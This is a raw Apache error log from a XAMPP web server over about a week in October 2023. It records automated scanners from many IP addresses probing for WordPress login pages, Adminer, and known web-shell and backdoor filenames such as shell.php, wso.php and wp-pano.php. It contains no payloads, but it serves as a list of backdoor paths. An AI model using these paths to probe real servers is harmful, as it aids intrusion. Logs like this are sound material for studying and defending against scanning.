[Fri Oct 06 23:04:17.061470 2023] [php:error] [pid 21316:tid 4840] [client 88.99.65.95:57640] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Oct 06 23:06:28.314132 2023] [php:error] [pid 21316:tid 4840] [client 49.247.3.23:60064] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Oct 06 23:09:09.042756 2023] [php:error] [pid 21316:tid 4840] [client 46.105.119.187:49102] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Oct 06 23:10:48.303020 2023] [php:error] [pid 21316:tid 4848] [client 46.105.119.187:49178] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Oct 06 23:12:07.578405 2023] [php:error] [pid 21316:tid 4848] [client 132.148.128.8:46602] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Sat Oct 07 00:52:22.071584 2023] [php:error] [pid 21316:tid 4904] [client 132.148.128.8:56220] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Sat Oct 07 01:02:38.072823 2023] [php:error] [pid 21316:tid 4832] [client 185.9.147.4:51110] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:02:40.387337 2023] [php:error] [pid 21316:tid 4932] [client 92.53.65.183:40752] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:02:43.637342 2023] [php:error] [pid 21316:tid 4784] [client 46.149.227.223:54466] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:03:13.883877 2023] [php:error] [pid 21316:tid 4784] [client 108.181.197.140:2387] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:06:53.175500 2023] [php:error] [pid 21316:tid 4848] [client 45.11.95.229:34730] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:07:28.534883 2023] [php:error] [pid 21316:tid 4848] [client 108.181.197.140:59488] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:07:53.176256 2023] [php:error] [pid 21316:tid 4784] [client 185.9.147.4:48584] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:09:08.504116 2023] [php:error] [pid 21316:tid 4804] [client 31.177.79.39:47838] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:09:15.978688 2023] [php:error] [pid 21316:tid 4804] [client 185.9.147.4:39296] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:10:08.118809 2023] [php:error] [pid 21316:tid 4932] [client 92.53.65.183:54020] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:14:05.718322 2023] [php:error] [pid 21316:tid 4804] [client 45.11.95.229:55920] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 01:49:02.270186 2023] [php:error] [pid 21316:tid 4904] [client 2.59.41.81:60084] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 03:27:33.911265 2023] [php:error] [pid 21316:tid 4804] [client 180.242.71.66:8433] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Sat Oct 07 03:33:23.609229 2023] [php:error] [pid 21316:tid 4804] [client 194.58.100.72:51278] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Sat Oct 07 17:41:34.830364 2023] [php:error] [pid 21316:tid 4804] [client 5.188.210.227:45641] script 'C:/xampp/htdocs/default/echo.php' not found or unable to stat, referer: https://www.google.com/
[Sat Oct 07 17:57:43.194504 2023] [authz_core:error] [pid 21316:tid 4876] [client 139.144.150.8:52254] AH01630: client denied by server configuration: C:/xampp/htdocs/default/server-status
[Sat Oct 07 19:26:39.734885 2023] [php:error] [pid 21316:tid 4848] [client 208.113.190.66:40040] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Oct 07 21:58:59.251782 2023] [php:error] [pid 21316:tid 4872] [client 134.209.155.21:54444] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Sat Oct 07 21:58:59.256841 2023] [php:error] [pid 21316:tid 4896] [client 134.209.155.21:54446] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Sat Oct 07 21:58:59.418839 2023] [php:error] [pid 21316:tid 4872] [client 134.209.155.21:54444] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Sat Oct 07 21:58:59.422835 2023] [php:error] [pid 21316:tid 4896] [client 134.209.155.21:54446] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Sat Oct 07 21:58:59.582842 2023] [php:error] [pid 21316:tid 4872] [client 134.209.155.21:54444] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Sat Oct 07 21:58:59.587843 2023] [php:error] [pid 21316:tid 4896] [client 134.209.155.21:54446] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Sun Oct 08 02:08:52.595812 2023] [php:error] [pid 21316:tid 4792] [client 8.218.212.177:56062] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Oct 08 10:55:02.593762 2023] [php:error] [pid 21316:tid 4784] [client 106.58.208.245:64901] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Oct 08 15:46:54.220865 2023] [php:error] [pid 21316:tid 4812] [client 190.147.138.101:58272] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Sun Oct 08 15:46:54.320237 2023] [php:error] [pid 21316:tid 4824] [client 14.174.36.253:63241] script 'C:/xampp/htdocs/default/register.php' not found or unable to stat
[Sun Oct 08 18:54:12.159539 2023] [php:error] [pid 21316:tid 4904] [client 66.94.112.5:41166] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Oct 08 18:57:47.475344 2023] [php:error] [pid 21316:tid 4884] [client 173.236.172.86:45352] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Oct 08 19:06:54.959390 2023] [php:error] [pid 21316:tid 4796] [client 103.120.176.201:42614] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Oct 08 19:32:45.341383 2023] [php:error] [pid 21316:tid 4804] [client 93.183.131.53:58038] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Oct 09 00:22:07.170868 2023] [php:error] [pid 21316:tid 4840] [client 194.113.235.169:36987] script 'C:/xampp/htdocs/default/p.php' not found or unable to stat, referer: http://fphosting.eu/p.php
[Mon Oct 09 00:22:07.171834 2023] [php:error] [pid 21316:tid 4768] [client 194.113.235.169:41913] script 'C:/xampp/htdocs/default/by.php' not found or unable to stat, referer: http://fphosting.eu/by.php
[Mon Oct 09 00:22:07.182853 2023] [php:error] [pid 21316:tid 4896] [client 194.113.235.169:52837] script 'C:/xampp/htdocs/default/t.php' not found or unable to stat, referer: http://fphosting.eu/t.php
[Mon Oct 09 14:26:12.812981 2023] [php:error] [pid 21316:tid 4884] [client 95.214.62.235:35018] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 14:27:04.175902 2023] [php:error] [pid 21316:tid 4904] [client 132.148.128.8:50132] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 14:27:05.644988 2023] [php:error] [pid 21316:tid 4884] [client 37.9.13.54:49714] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 14:30:44.895834 2023] [php:error] [pid 21316:tid 4884] [client 185.253.8.122:54248] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 14:32:03.422388 2023] [php:error] [pid 21316:tid 4884] [client 27.131.109.194:44252] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 14:32:34.900688 2023] [php:error] [pid 21316:tid 4884] [client 132.148.128.8:54932] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 14:35:24.742911 2023] [php:error] [pid 21316:tid 4884] [client 49.247.3.23:53072] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 14:37:16.348251 2023] [php:error] [pid 21316:tid 4840] [client 160.153.254.38:56032] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 17:37:33.690346 2023] [php:error] [pid 21316:tid 4884] [client 132.148.128.8:33536] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 09 19:36:32.071251 2023] [php:error] [pid 21316:tid 4756] [client 80.251.219.111:51126] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 01:54:23.348868 2023] [cgi:error] [pid 21316:tid 4848] [client 123.240.7.168:52974] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/setup.cgi
[Tue Oct 10 02:18:42.564719 2023] [php:error] [pid 21316:tid 4756] [client 104.197.209.149:49646] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 03:27:07.425744 2023] [php:error] [pid 21316:tid 4848] [client 194.169.175.29:35098] script 'C:/xampp/htdocs/default/inputs.php' not found or unable to stat
[Tue Oct 10 07:08:15.398546 2023] [php:error] [pid 21316:tid 4712] [client 173.82.78.214:57846] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 14:21:51.942349 2023] [cgi:error] [pid 21316:tid 4676] [client 35.178.199.108:48038] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Tue Oct 10 15:05:28.129837 2023] [cgi:error] [pid 21316:tid 4860] [client 35.178.199.108:37370] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/index.asp
[Tue Oct 10 20:11:33.003743 2023] [php:error] [pid 21316:tid 4924] [client 35.226.196.179:51782] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 20:30:22.671912 2023] [php:error] [pid 21316:tid 4784] [client 54.36.164.77:34316] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 20:32:03.834880 2023] [php:error] [pid 21316:tid 4908] [client 78.128.8.156:39856] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 20:36:54.522455 2023] [php:error] [pid 21316:tid 4908] [client 149.126.4.120:53696] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 20:39:02.814159 2023] [php:error] [pid 21316:tid 4908] [client 104.197.209.149:50558] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 20:57:55.473733 2023] [php:error] [pid 21316:tid 4684] [client 50.63.3.108:22198] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Tue Oct 10 20:57:55.473733 2023] [php:error] [pid 21316:tid 4924] [client 50.63.3.108:22206] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Tue Oct 10 20:57:55.474732 2023] [php:error] [pid 21316:tid 4784] [client 50.63.3.108:22202] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Tue Oct 10 20:57:55.474732 2023] [php:error] [pid 21316:tid 4756] [client 50.63.3.108:22204] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Tue Oct 10 20:57:55.474732 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:22200] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Tue Oct 10 20:57:55.474732 2023] [php:error] [pid 21316:tid 4876] [client 50.63.3.108:22208] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Tue Oct 10 21:03:12.876860 2023] [php:error] [pid 21316:tid 4860] [client 50.63.3.108:38363] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Tue Oct 10 21:03:12.876860 2023] [php:error] [pid 21316:tid 4784] [client 50.63.3.108:38367] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Tue Oct 10 21:03:12.876860 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:38357] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Tue Oct 10 21:03:12.876860 2023] [php:error] [pid 21316:tid 4684] [client 50.63.3.108:38365] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Tue Oct 10 21:03:12.876860 2023] [php:error] [pid 21316:tid 4756] [client 50.63.3.108:38361] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Tue Oct 10 21:03:12.876860 2023] [php:error] [pid 21316:tid 4908] [client 50.63.3.108:38359] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Tue Oct 10 21:06:37.904251 2023] [php:error] [pid 21316:tid 4908] [client 167.71.175.36:54728] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Tue Oct 10 21:06:37.907213 2023] [php:error] [pid 21316:tid 4876] [client 167.71.175.36:54730] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Tue Oct 10 21:06:37.909249 2023] [php:error] [pid 21316:tid 4860] [client 167.71.175.36:54712] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Tue Oct 10 21:06:37.910250 2023] [php:error] [pid 21316:tid 4852] [client 167.71.175.36:54708] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Tue Oct 10 21:06:37.915193 2023] [php:error] [pid 21316:tid 4684] [client 167.71.175.36:54692] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Tue Oct 10 21:06:38.901162 2023] [php:error] [pid 21316:tid 4756] [client 167.71.175.36:54740] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Tue Oct 10 21:19:15.949029 2023] [php:error] [pid 21316:tid 4908] [client 81.91.189.244:33516] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Tue Oct 10 21:19:15.949029 2023] [php:error] [pid 21316:tid 4684] [client 81.91.189.244:33518] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Tue Oct 10 21:19:15.951029 2023] [php:error] [pid 21316:tid 4876] [client 81.91.189.244:33520] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Tue Oct 10 21:19:15.953028 2023] [php:error] [pid 21316:tid 4756] [client 81.91.189.244:33517] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Tue Oct 10 21:19:15.954029 2023] [php:error] [pid 21316:tid 4852] [client 81.91.189.244:33515] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Tue Oct 10 21:19:15.954029 2023] [php:error] [pid 21316:tid 4860] [client 81.91.189.244:33519] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Tue Oct 10 21:24:14.726473 2023] [php:error] [pid 21316:tid 4876] [client 81.161.229.63:51794] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 10 21:27:11.926336 2023] [php:error] [pid 21316:tid 4860] [client 50.63.3.108:49862] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Tue Oct 10 21:27:11.926336 2023] [php:error] [pid 21316:tid 4876] [client 50.63.3.108:49860] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Tue Oct 10 21:27:11.927312 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:49864] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Tue Oct 10 21:27:11.928255 2023] [php:error] [pid 21316:tid 4684] [client 50.63.3.108:49866] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Tue Oct 10 21:27:11.929255 2023] [php:error] [pid 21316:tid 4908] [client 50.63.3.108:49868] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Tue Oct 10 21:27:11.929255 2023] [php:error] [pid 21316:tid 4756] [client 50.63.3.108:49870] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Tue Oct 10 21:36:14.767826 2023] [php:error] [pid 21316:tid 4852] [client 178.208.95.13:59766] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Tue Oct 10 21:36:14.817830 2023] [php:error] [pid 21316:tid 4876] [client 178.208.95.13:59856] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Tue Oct 10 21:36:15.787646 2023] [php:error] [pid 21316:tid 4908] [client 178.208.95.13:60864] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Tue Oct 10 21:36:15.886421 2023] [php:error] [pid 21316:tid 4684] [client 178.208.95.13:60966] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Wed Oct 11 00:24:36.442110 2023] [php:error] [pid 21316:tid 4908] [client 47.95.112.71:40820] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Oct 11 00:51:07.758681 2023] [php:error] [pid 21316:tid 4784] [client 194.58.100.72:38560] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Wed Oct 11 00:51:33.280535 2023] [php:error] [pid 21316:tid 4784] [client 185.9.147.4:59296] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Wed Oct 11 00:58:47.029561 2023] [php:error] [pid 21316:tid 4700] [client 37.9.13.54:37882] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Wed Oct 11 00:59:09.320720 2023] [php:error] [pid 21316:tid 4700] [client 72.167.56.12:62678] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Wed Oct 11 03:11:41.540749 2023] [php:error] [pid 21316:tid 4860] [client 45.138.16.76:27632] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Oct 11 03:54:49.317236 2023] [php:error] [pid 21316:tid 4756] [client 37.9.13.54:44294] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Wed Oct 11 08:08:57.054336 2023] [php:error] [pid 21316:tid 4804] [client 50.62.141.183:32480] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Wed Oct 11 08:08:57.054336 2023] [php:error] [pid 21316:tid 4908] [client 50.62.141.183:32482] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Wed Oct 11 08:08:57.213391 2023] [php:error] [pid 21316:tid 4804] [client 50.62.141.183:32480] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Wed Oct 11 08:08:57.213391 2023] [php:error] [pid 21316:tid 4908] [client 50.62.141.183:32482] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Wed Oct 11 08:08:57.371400 2023] [php:error] [pid 21316:tid 4804] [client 50.62.141.183:32480] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Wed Oct 11 08:08:57.372388 2023] [php:error] [pid 21316:tid 4908] [client 50.62.141.183:32482] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Wed Oct 11 17:15:56.051324 2023] [php:error] [pid 21316:tid 4824] [client 139.59.2.175:35596] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Oct 11 21:42:15.329396 2023] [php:error] [pid 21316:tid 4732] [client 188.40.158.25:62583] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Wed Oct 11 21:46:49.957702 2023] [php:error] [pid 21316:tid 4636] [client 185.225.74.102:8225] script 'C:/xampp/htdocs/default/adminer.php' not found or unable to stat
[Wed Oct 11 21:46:50.271241 2023] [php:error] [pid 21316:tid 4636] [client 185.225.74.102:2252] script 'C:/xampp/htdocs/default/adminer.php' not found or unable to stat
[Wed Oct 11 21:46:50.727536 2023] [php:error] [pid 21316:tid 4636] [client 185.225.74.102:9194] script 'C:/xampp/htdocs/default/adminer.php' not found or unable to stat
[Thu Oct 12 04:07:17.577944 2023] [php:error] [pid 21316:tid 4824] [client 107.189.30.69:52770] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Oct 12 05:32:14.553800 2023] [php:error] [pid 21316:tid 4824] [client 194.113.235.169:48208] script 'C:/xampp/htdocs/default/wso.php' not found or unable to stat, referer: http://fphosting.eu/wso.php
[Thu Oct 12 05:32:14.599086 2023] [php:error] [pid 21316:tid 4944] [client 194.113.235.169:36188] script 'C:/xampp/htdocs/default/ws.php' not found or unable to stat, referer: http://fphosting.eu/ws.php
[Thu Oct 12 07:35:04.473601 2023] [php:error] [pid 21316:tid 4732] [client 194.169.175.28:42464] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Thu Oct 12 08:10:40.898101 2023] [php:error] [pid 21316:tid 4792] [client 37.9.13.54:43026] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Thu Oct 12 08:16:21.859170 2023] [php:error] [pid 21316:tid 4732] [client 185.116.195.198:52528] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Thu Oct 12 08:19:29.022784 2023] [php:error] [pid 21316:tid 4792] [client 5.202.112.26:40975] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
